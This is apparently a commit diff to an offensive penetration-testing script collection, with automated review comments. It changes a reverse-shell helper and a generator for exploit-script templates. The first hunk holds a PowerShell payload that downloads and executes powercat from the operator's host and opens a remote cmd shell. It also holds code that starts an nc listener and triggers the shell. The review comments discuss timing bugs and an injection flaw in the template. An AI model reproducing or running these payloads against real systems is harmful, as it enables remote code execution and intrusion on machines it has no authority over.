Roman Hergenreder 2021-06-11 12:44:35 +02:00
parent 29d5f63c58
commit 1891efe2e4
2 changed files with 16 additions and 7 deletions

@ -4,6 +4,8 @@ import socket
import sys
import pty
import util
import time
import threading
def generatePayload(type, local_address, port):
@ -29,7 +31,11 @@ def generatePayload(type, local_address, port):
return "powershell.exe -c \"IEX(New-Object System.Net.WebClient).DownloadString('http://%s/powercat.ps1');powercat -c %s -p %d -e cmd\"" % (local_address, local_address, port)
def triggerShell(func, port):
def _wait_and_exec():
time.sleep(1.5)
func()
threading.Thread(target=_wait_and_exec).start()
pty.spawn(["nc", "-lvvp", str(port)])
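Review bot: The helper thread started in `triggerShell` is non-daemon and calls `func()` after a fixed 1.5 s, whether or not the `nc` listener spawned on the following line is actually running. If `pty.spawn` returns early (for example because the port is already in use), `func()` still fires afterwards against a port this process does not control, and the pending thread keeps the interpreter alive until it has done so. An exception raised inside `func()` is reported only by the thread, while the listener keeps blocking. I would start it as `threading.Thread(target=_wait_and_exec, daemon=True).start()` and add a comment above the sleep such as `# fixed delay so nc can bind first; this is not a readiness check`. The hunk ends at the `pty.spawn` call, so anything that follows it in the function is not visible here.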

@ -5,21 +5,23 @@ import sys
def generateTemplate(baseUrl):
template = """#!/usr/bin/env python
import requests
import base64
import sys
import json
import base64
import requests
from bs4 import BeautifulSoup
from hackingscripts import util, fileserver
from urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
BASE_URL = "%s"
BASE_URL = "%s" if "LOCAL" not in sys.argv else "http://127.0.0.1:1337"
def login(username, password):
# Template method to create a session
session = requests.Session()
post_data = { "username": username, "password": password }
res = ression.post(BASE_URL + "/login", data=post_data, allow_redirects=False)
res = session.post(BASE_URL + "/login", data=post_data, allow_redirects=False)
if res.status_code != 302 or "Location" not in res.headers or res.headers["Location"] != "/home":
print("Login failed")
exit()
@ -29,6 +31,7 @@ def exploit(session, payload):
# Template method to exploit an endpoint
pass
if __name__ == "__main__":
session = login()
exploit(session, "id")
""" % baseUrl
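Review bot: The new `BASE_URL` line still splices `baseUrl` into the generated script through `"%s"` (filled by `% baseUrl` at the end of the template), so a URL containing a double quote or a backslash produces a script that is broken or contains code the operator did not write. Emitting the value as a Python literal avoids that: `BASE_URL = %r if "LOCAL" not in sys.argv else "http://127.0.0.1:1337"`. Separately, the generated `__main__` block still calls `login()` with no arguments although `login(username, password)` takes two, so the template raises `TypeError` before `exploit` is reached. Now that `sys` is imported, `sys.exit(1)` would also be clearer than the bare `exit()` after "Login failed". The lines between the second and third hunk (the rest of `login` and the start of `exploit`) are not visible here.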